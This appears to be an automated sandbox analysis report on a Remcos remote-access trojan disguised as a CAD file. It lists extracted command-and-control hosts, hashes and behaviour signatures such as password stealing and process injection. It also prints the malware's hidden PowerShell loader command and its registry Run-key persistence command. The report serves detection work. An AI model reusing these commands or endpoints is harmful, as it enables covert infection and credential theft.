Analysis
-
max time kernel
299s -
max time network
290s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-01-2025 13:38
Static task
static1
Behavioral task
behavioral1
Sample
CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe
Resource
win10v2004-20241007-en
General
-
Target
CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe
-
Size
643KB
-
MD5
5cba30723bcacc171aa6417869f5981c
-
SHA1
a8abaf40ae64d44f9055d4dd3df2f91ac393ecc1
-
SHA256
d20dae11fd9de533d5ba84666b26dbf233161d991643d2de08fd043699cddbcc
-
SHA512
6ebb1d4f664933e6f063759c2a615feb72ef250b5a0ec0f3f9775868bacc661931ee64e9ae943db6f58a43b08eac7350a1f511ebf97620356bc504e81d78c431
-
SSDEEP
12288:llLIJdKsaouLbYCjUnmITaCQwN44mlIc4G66Jg1KCe4sEftmU3BgKiC:lSJaouPYComqa6fcx66Jg16EfthGC
Malware Config
Extracted
remcos
SPREDE
oaziamaka111.duckdns.org:4689
oaziamaka111.duckdns.org:4688
oaziamaka222.duckdns.org:4689
oaziamaka222.duckdns.org:4688
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
aleopty.dat
-
keylog_flag
false
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
deokloksgb-NAYJ41
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
- startup_value
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/3464-82-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/3368-87-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/4440-80-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/4440-80-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/3464-82-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4336 powershell.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kldevare = "%Dishonorer% -windowstyle 1 $Provianterendes=(Get-Item 'HKCU:\\Software\\Decade\\').GetValue('Uprightman');%Dishonorer% ($Provianterendes)" reg.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 21 3440 msiexec.exe 23 3440 msiexec.exe 25 3440 msiexec.exe 27 3440 msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3440 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4336 powershell.exe 3440 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3440 set thread context of 3464 3440 msiexec.exe 102 PID 3440 set thread context of 4440 3440 msiexec.exe 103 PID 3440 set thread context of 3368 3440 msiexec.exe 104 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1824 reg.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 4336 powershell.exe 4336 powershell.exe 4336 powershell.exe 4336 powershell.exe 4336 powershell.exe 4336 powershell.exe 4336 powershell.exe 4336 powershell.exe 4336 powershell.exe 3464 msiexec.exe 3464 msiexec.exe 3368 msiexec.exe 3368 msiexec.exe 3464 msiexec.exe 3464 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 4336 powershell.exe 3440 msiexec.exe 3440 msiexec.exe 3440 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 4336 powershell.exe Token: SeIncreaseQuotaPrivilege 4336 powershell.exe Token: SeSecurityPrivilege 4336 powershell.exe Token: SeTakeOwnershipPrivilege 4336 powershell.exe Token: SeLoadDriverPrivilege 4336 powershell.exe Token: SeSystemProfilePrivilege 4336 powershell.exe Token: SeSystemtimePrivilege 4336 powershell.exe Token: SeProfSingleProcessPrivilege 4336 powershell.exe Token: SeIncBasePriorityPrivilege 4336 powershell.exe Token: SeCreatePagefilePrivilege 4336 powershell.exe Token: SeBackupPrivilege 4336 powershell.exe Token: SeRestorePrivilege 4336 powershell.exe Token: SeShutdownPrivilege 4336 powershell.exe Token: SeDebugPrivilege 4336 powershell.exe Token: SeSystemEnvironmentPrivilege 4336 powershell.exe Token: SeRemoteShutdownPrivilege 4336 powershell.exe Token: SeUndockPrivilege 4336 powershell.exe Token: SeManageVolumePrivilege 4336 powershell.exe Token: 33 4336 powershell.exe Token: 34 4336 powershell.exe Token: 35 4336 powershell.exe Token: 36 4336 powershell.exe Token: SeDebugPrivilege 3368 msiexec.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3440 msiexec.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 1320 wrote to memory of 4336 1320 CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe 83 PID 1320 wrote to memory of 4336 1320 CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe 83 PID 1320 wrote to memory of 4336 1320 CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe 83 PID 4336 wrote to memory of 3440 4336 powershell.exe 96 PID 4336 wrote to memory of 3440 4336 powershell.exe 96 PID 4336 wrote to memory of 3440 4336 powershell.exe 96 PID 4336 wrote to memory of 3440 4336 powershell.exe 96 PID 3440 wrote to memory of 4232 3440 msiexec.exe 97 PID 3440 wrote to memory of 4232 3440 msiexec.exe 97 PID 3440 wrote to memory of 4232 3440 msiexec.exe 97 PID 4232 wrote to memory of 1824 4232 cmd.exe 100 PID 4232 wrote to memory of 1824 4232 cmd.exe 100 PID 4232 wrote to memory of 1824 4232 cmd.exe 100 PID 3440 wrote to memory of 3464 3440 msiexec.exe 102 PID 3440 wrote to memory of 3464 3440 msiexec.exe 102 PID 3440 wrote to memory of 3464 3440 msiexec.exe 102 PID 3440 wrote to memory of 3464 3440 msiexec.exe 102 PID 3440 wrote to memory of 4440 3440 msiexec.exe 103 PID 3440 wrote to memory of 4440 3440 msiexec.exe 103 PID 3440 wrote to memory of 4440 3440 msiexec.exe 103 PID 3440 wrote to memory of 4440 3440 msiexec.exe 103 PID 3440 wrote to memory of 3368 3440 msiexec.exe 104 PID 3440 wrote to memory of 3368 3440 msiexec.exe 104 PID 3440 wrote to memory of 3368 3440 msiexec.exe 104 PID 3440 wrote to memory of 3368 3440 msiexec.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe"C:\Users\Admin\AppData\Local\Temp\CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Topskuddene=gc -Raw 'C:\Users\Admin\AppData\Local\Temp\terrorproof\smuttersens\Panics.End';$Flygtningebaggrund=$Topskuddene.SubString(72585,3);.$Flygtningebaggrund($Topskuddene)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kldevare" /t REG_EXPAND_SZ /d "%Dishonorer% -windowstyle 1 $Provianterendes=(Get-Item 'HKCU:\Software\Decade\').GetValue('Uprightman');%Dishonorer% ($Provianterendes)"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kldevare" /t REG_EXPAND_SZ /d "%Dishonorer% -windowstyle 1 $Provianterendes=(Get-Item 'HKCU:\Software\Decade\').GetValue('Uprightman');%Dishonorer% ($Provianterendes)"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1824
-
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ifvhvecntnemqmmaiymxaht"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3464
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\thbaowvphvwrtsieriyylmgaum"4⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:4440
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\dbglopgjdeoedywqjtlaozardsfet"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3368
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD517eece3240d08aa4811cf1007cfe2585
SHA16c10329f61455d1c96e041b6f89ee6260af3bd0f
SHA2567cc0db44c7b23e4894fe11f0d8d84b2a82ad667eb1e3504192f3ba729f9a7903
SHA512a7de8d6322410ec89f76c70a7159645e8913774f38b84aafeeeb9f90dc3b9aa74a0a280d0bb6674790c04a8ff2d059327f02ebfda6c4486778d53b7fc6da6370
-
Filesize
308KB
MD595456efa53e67771a7a366a1729330a5
SHA17c6753470c3f2a1919af9608040e31404eb15955
SHA2564e5986d80aa60a80b07731921a0dbb905f663de679dbc4bfe897ad27fe04555d
SHA51236bd759c9e49100db6739293ccbb1508b260b5866813d085403e489ec40e86019cfccdebb6a134afdd3fe42410c53a57865ef904eefd7cd33b9944f7cb4f3d13
-
Filesize
70KB
MD5fa9db15fb8638e539838260c0f09078b
SHA1adcb4f9c75b0120d8f0369edd71d75397bd9507f
SHA256648a811ffe8215aa2f12cdfcbed2ca0efa438a628a0164e592508e56538bbd4b
SHA51224412e43da7b725aad0bf64347ac718573bd3c95409cb9a1c6f90f9abb474fae46583588b7eb9943d5be829b6466007fb28cefbad59b819d88064b30205b1153